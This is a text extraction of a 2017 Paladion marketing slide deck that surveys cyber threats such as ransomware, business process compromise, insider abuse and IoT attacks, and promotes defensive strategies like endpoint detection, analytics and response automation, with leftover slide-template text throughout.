Strategies to Combat New, Innovative Cyber Threats - 2017

Click to edit Master title style
STRICTLY PRIVATE & CONFIDENTIAL © 2017
 Click to edit Master text styles
 Second level
 Third level
 Fourth level
 Fifth level
Strategies to Combat New,
Innovative Cyber Threats - 2017

 Second level
 Third level
 Fourth level
 Fifth level
2 STRICTLY PRIVATE & CONFIDENTIAL © 2017
Enterprise Security for 2017
Key Cyber Threats to Defend Against in 2017
Key
Cyber Strategies
to Deploy in 2017
Ransomware and its evolving
variants
Compromised business
processes
Increased organizational
social engineering
Insider technical
compromises
Threats to non-perimeter
assets
Analytical machine learning
based detection
Enhanced end-point
detection
Orchestrated responses
Digital VM systems
CloudOps and DevOps
security

 Second level
 Third level
 Fourth level
 Fifth level
New, Innovative Threats to Watch out for
IOT threats
AI & voice first attacks
Smart cities attack
Bionics attack
The Mirai worm and Dyn attack exposed
vulnerability of IOT systems, acting as a launch
pad for other attacks. IOT device usage is
expected to rise by 400% in 2017, making this a
significant threat.
Attacks on IOTs such as cars, drones, industrial
systems, and others should also be considered
The rise in social media, self publishing ,and the
shrinking attention span of readers has caused
an increase in fake news circulation. This will
soon be used for cyber fraud by luring users to
act on false information—such as selling of
stock and other schemes
As we move beyond touch to voice based
interactions, new forms of attacks are likely.
Example #1: Tricking AI algorithms with fake data
to gain info and then having the voice-enabled
system fool users into performing an action.
Example #2: Your banking bot could talk consumers
into giving away credentials to attackers.
Smart city grids that control transportation, utilities,
communication, financial services, and other citizen life data
will be prone to innovative attacks that leverage a single
vector; impacting multiple facilities. Eg: using business logic
weaknesses to obtain data that enables compromise
Attacks on medical devices such as
pacemakers are already being
researched. As greater integration of
human capability and technology occurs,
attacks will become life threatening.
2017 will see more concept level threats
showcased by researchers. The future
will see a combination of neuro and
cyber weapons as criminals catch on
Fake news attacks

 Second level
 Third level
 Fourth level
 Fifth level
Key Threats 2017

 Second level
 Third level
 Fourth level
 Fifth level
Ransomware and Variants
Malware objectives between 2001- 2017
now include file deletions, network
clogging, botnet creation, data stealing &
selling, and data encryption for ransom
Ransowmworm: ransomware
combining worm capabilities
that spreads fast.
Double dipping: adding data
stealing capabilities along with
encryption to double profits—
once through ransom from the
organization and then through
the underground selling of data
2017 WILL SEE
Aided by more data on end points and
easy anonymous pay gate options
Increased by 4 times compared to
2015
Total losses due to ransomware attacks
cost over one billion USD, affecting
over 100 thousand companies
2016 SAW A RAPID INCREASE IN RANSOMWARE
Ransomware variations have also increased
Layered infections that include Trojans and key loggers along with ransomware
Selective files and folder encryption
Attackers are targeting high risks sectors such as Financial services,
healthcare, utilities and SMB.
Refer to Paladion paper for top variants of ransomware during 2016
and their IOCs for detection
Opportunity

 Second level
 Third level
 Fourth level
 Fifth level
Business Process Compromise (BPC)
BPC is complex attacks using-
social engineering, malwares,
account takeovers, man-in-
middle attacks, sniffing and
data exfiltration
Cyber criminals are targeting entire business processes more and more.
Attacks on banks target payment processes involving multiple assets, users, and intimate
transaction knowledge (e.g. Bank of Bangladesh). Several copycat attacks on payment systems
were reported in the financial sector during 2016. Attackers also targeted inventory
management processes, vendor payment processes, and supply chain processes.
These attacks have a higher payoff (averaging millions of USD as opposed to hundreds for
ransomware). Larger, more organized cyber crime gangs and rogue nation state players will be
attracted to such attacks. They take more time, skills and knowledge of internal processes, but
the pay-off is significantly higher.
Global losses are estimated at over 2 billion USD; affecting thousands of organizations.
Organizations’ abilities to defend themselves are weaker today. The focus is on protecting
individual assets and applications, while ignoring attack campaigns on business processes.
2017 prediction: The average value in BPC attacks will go up, causing some organizations to lose
tens of millions of USD. The number of affected organizations will still be lower given the effort
involved in launching such attacks.

 Second level
 Third level
 Fourth level
 Fifth level
Targeted Business Social Engineering
Business social
engineering schemes
included- CEO fraud,
bogus invoice schemes,
legal scare scams,
identity takeover of
executives, PII data
stealing
Social engineering attacks on organizations have increased; with attackers
conducting research on employees and company strategies before scamming
high level employees.
Attacker research includes social media data, company news releases,
technology case studies, and internal data obtained through sniffing. Attackers
then target lower level employees with emails, social media communications,
and customized website messages.
The majority of BPC attacks involve long campaigns of targeted social
engineering.
These attacks could also be short non-technical attacks such as Business Email
Compromise (BEC) attacks which saw a rise in 2016. BEC utilizes the
knowledge of an organization’s internal processes to trick employees into
conducting payments and other transactions on behalf of attackers.
The estimated losses from BEC alone were over 3 billion USD in 2016,
affecting over fifty thousand organizations globally.
2017 prediction: Given the amount of available online data on employees and
organizations this type of attack is easy to carry out. Innovation will no longer
be on the technical aspects of an attack, but rather on fraud schemes. 2017
will see many variations in tricking employees to give away data or money.
@

 Second level
 Third level
 Fourth level
 Fifth level
Hi-Tech Insider Abuse
Insider threats have received reduced attention due to the stream of news about external attacks.
 But insider threats continue to affect organizations, despite their small number compared to external
attacks. (60% external versus less than 30% internal)
Over the past few years, two key controls—data leakage detection and privileged identity management—
have contained this threat
Insider threats continue to rise as the workforce composition changes. Today there is more technical knowhow
and teleworking, but less organizational empathy. The following attacks will get more sophisticated:
 Data leakage bypass through encryption
 Chunking through micro blogging
 Masquerading as normal traffic
 Collaboration with external threat actors
2017 predictions: Insider attacks will become as hi-tech as advanced external attacks. These attacks will
involve longer campaigns, multiple evasive tools, and co-worker social engineering for credential thefts
Nine Things You Need to know about Insider Threats
Types of Incidents
35% of organizations have experienced at least one
insider threat, with the following breakdown (the total
does not equal 100% as some respondents had more
than one type of incident)
Data leak: 49%
Fraud: 41%
Data breach: 36%
IP theft: 16%

 Second level
 Third level
 Fourth level
 Fifth level
Threats to non-perimeter assets
3 trends have already reached
tipping point
Threats to these assets and
data outside of enterprise
perimeters are a reality. Cloud
and social media incidents
related to corporate data have
seen a 70% rise
Organizations have not
formalized risk modeling
frameworks for assets and data.
In addition, their on-premise
risk mitigation isn’t easily
transferrable. E.g. monitoring
for threats in a cloud requires
different architecture and data
collection; and existing IPS and
SIEM cannot be extended the
same way cloud assets are
2017 prediction: Attacks
focused only on non-perimeter
assets will increase.
Organizations will have a
significant delay in discovering
them—compared to the
average 150 days for on-
premises attacks
 Teleworking and personal
devices used for an
increasingly mobile
workforce
 Cloud-first strategy for both
native cloud and SaaS
applications
 Social media administering
corporate information and
marketing activities
 25% of employees work remotely at
least part of the time
 32% have used personal devices in
addition to corporate devices.
 57% of organizations have cloud assets
today
 Organizations on average have 3 SaaS
apps deployed
 Corporate data is 40% as likely to be in
social media as in internal stores.

 Second level
 Third level
 Fourth level
 Fifth level
Key Strategies 2017

 Second level
 Third level
 Fourth level
 Fifth level
Strategy 1: Analytical and Machine Learning systems
Advanced threats are bypassing
rule based systems. Malware,
account takeover attacks,
lateral movements, data
exfiltration and fraudulent
transactions are being modified
by attackers to avoid detection
The typical advanced attack is a
long drawn out campaign;
similar to a war with multiple
battles within one single attack.
Current detection systems are
unable to link individual threats
into the full campaign,
preventing a big picture view of
the attack.
2017 will see organizations
adopt more analytical systems
with machine learning
capabilities and big data
storage approaches to solve the
latter two problems. Gartner
estimates that over 50% of
organizations will have security
data warehouses with analytics
data within the next four years.
(For a detailed description of
this strategy, refer to the
Paladion 2 report on next Gen
SOC and security analytics)
Machine learning analytics will
be applied for network
analytics, end point analytics,
user & entity behavior
analytics, and for deeper
mining of security alerts.
 Use analytical and machine learning
based systems for advanced malware
and ransomware, slow and low attacks,
unknown attack methods, data
exfiltration, transaction frauds and to
see long drawn out campaigns

 Second level
 Third level
 Fourth level
 Fifth level
Variation of this Diagram
Visual Layer Collaboration
Active Discover
Raw Data Context Data Alert Data
Connector Layer
Active Response
Alerts
Big data technology with data sciences
Machine learning methods
 Outlier algorithms
 Pattern search algorithms
 Association algorithms
 Rare event algorithms
Graph Theory
 Link analysis
 Visual analytics
Multi-node streaming rule engine Data mining
 Statistical & Probabilistic
modelling

 Second level
 Third level
 Fourth level
 Fifth level
Strategy 2 : End Point Threat Detection
Organizations have matured via logs and network threat
monitoring; made possible by wide adoption of SIEM, IPS
and network sandboxing technologies. Advanced
attackers are now bypassing these technologies by
attacking users and their end point devices. DBIR data
shows over 40% of today’s breaches are caused by end
point compromises.
Traditional anti-malware technologies can no longer contain
these advanced attacks
 New malware that bypasses signatures and detect
sandboxing
 Malware using scripts and batch files
 Account takeovers via social engineering or privilege
escalation attacks on endpoints
Organizations will enable similar 24/7 monitoring for
endpoints as done for networks and logs today. This
monitoring will continuously search for threat &
compromise indicators on endpoints using a
combination of rules, signatures, behavior anomalies,
and peer profiling.
2017 will see large organizations rolling out EDR
technologies and services. IDC estimates that
over 80% of organizations will have this capability
by 2018. Refer to Paladion’s report on IST for
more details on how to monitor threats at end
points.

 Second level
 Third level
 Fourth level
 Fifth level
SHORTER FORM OF THIS DIAGRAM
Remediation at scale5
Endpoints with agents installed1 Paladion ETDR – as a Service2
Analysis and Investigation4 Fast, Accurate,
Complete Detection at scale
3
Fix Issues quickly and Completely
Data
Leakage
Malware
Activity
User
Behaviors
Lateral
Movement
IR
for alerts
Continuous Monitoring
on Endpoints
Validate Prioritize Mitigate

 Second level
 Third level
 Fourth level
 Fifth level
Strategy 3 : Response Automation and Orchestration
Manual incident response is a time consuming process. The
average time for responses involving triage, incident analysis,
containment, recovery, and eradication is over 35 days.
Furthermore, organizations do not have runbooks for handling
common incidents, and end up being unprepared for threats.
2017 will see organizations invest in central incident response
platforms with automation for various stages of incident
management. Organizations will build or acquire runbooks that
integrate with these platforms. The platform will also have
analytical capabilities to analyze incidents in-depth, uncovering the
full blast radius and patient zero for long campaigns.
Forrester estimates that over 37% of organizations are
currently planning to automate incident response
management through analytics. For more details on how to
implement this strategy, refer to Paladion’s reports on Next
Gen SOC and security analytics & orchestration.

 Second level
 Third level
 Fourth level
 Fifth level
Response Automation Diagram
Alert Validation
Verify how relevant the alert
is in your context and the
likelihood of damage
Investigate the impact,
attacker, attack campaign
and extent of compromise
Quickly contain the attack
and its impact to stop the
spread
Design security features to
remove root causes and
prevent repeat breaches
Incident Analysis Containment
Root Mitigation
……………. across the lifecycle 24/7

 Second level
 Third level
 Fourth level
 Fifth level
Strategy 4: Digital VM Programs
Continuous Automated
Intelligence
Vulnerability management programs in most organizations are slow and
cumbersome. Automation of test planning, scheduling, reporting,
mitigation, analytics generation, and distribution is limited
The vulnerability results are not prioritized for attack scenarios; i.e.
which vulnerability will be exploited in an organization’s own
context and hence needs faster remediation. There is limited threat
intelligence gathering and correlation of vulnerabilities
Digital VM programs aim to automate analytics and threat
intelligence so that vulnerability discovery, mitigation, and
stakeholder collaboration is fast tracked. These enable VM
programs to run continuously like existing security monitoring
programs
2017 will see organizations implement digital VM programs with a
centralized VM platform. Gartner estimates that enterprises that
implement a strong vulnerability management process will
experience 90% less successful attacks
Refer to Paladion’s report on this topic. It’s time to stop being
complacent about vulnerabilities and execute this strategy
Analytics
Discovery
Testing
Triaging
Mitigation

 Second level
 Third level
 Fourth level
 Fifth level
Digital VM platform
Workflow Management Vulnerability Analytics
Asset
Aggregator
Test
Manager
Security
Telemetry
Triage
Engine
Solution
Store
Policy
Enforcer
Test
Administrators PenTesters
Vulnerability
Analysts Solution SME Remeditators

 Second level
 Third level
 Fourth level
 Fifth level
Strategy 5 : Security for CloudOps and Devops
Organizations moving to cloud
for their development—in
terms of testing and
production systems—will look
for integrating security into
their CloudOps and DevOps.
DoS attacks are already happening on
the cloud. It’s the APT kind of attacks
that will be difficult to detect in a cloud
environment, and this can potentially
affect multiple tenants simultaneously.
The two main requirements for security will be:
 speed of controls given that CloudOps and DevOps are both highly automated in providing resources,
changing configurations, and deploying systems & users
 Seamless use of cloud technologies such as native APIs of cloud providers, configuration management
systems such as chef/puppet, and ChatOps system such as Slack
Securing CloudOps and DevOps need
tools that are differently built. This can
be in security monitoring, vulnerability
testing, configuration reviews, or
identity & user activity monitoring.
In 2017, organizations will adopt
new security architecture &
practices to secure cloud assets
and a more agile development
environment. They will then look
at integrating these security
processes into their traditional on-
premise security management
systems for an integrated view.

 Second level
 Third level
 Fourth level
 Fifth level
Cloud Architecture
Cloud Trail
FlowLogs
CloudWatch
IAM
Docker
Collector
Network Threat
Module
Windows servers
Unix servers
Amazon Console
Scanners
Automation
Script
Cloud Security Platform
On
premise SOCs

 Second level
 Third level
 Fourth level
 Fifth level
Contact us today to combat today’s
sophisticated cyber threats
www.paladion.netVisit
sales@paladion.netE-mail

Strategies to Combat New, Innovative Cyber Threats - 2017

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Strategies to Combat New, Innovative Cyber Threats - 2017

Similar to Strategies to Combat New, Innovative Cyber Threats - 2017 (20)

Recently uploaded

Recently uploaded (20)

Strategies to Combat New, Innovative Cyber Threats - 2017

Editor's Notes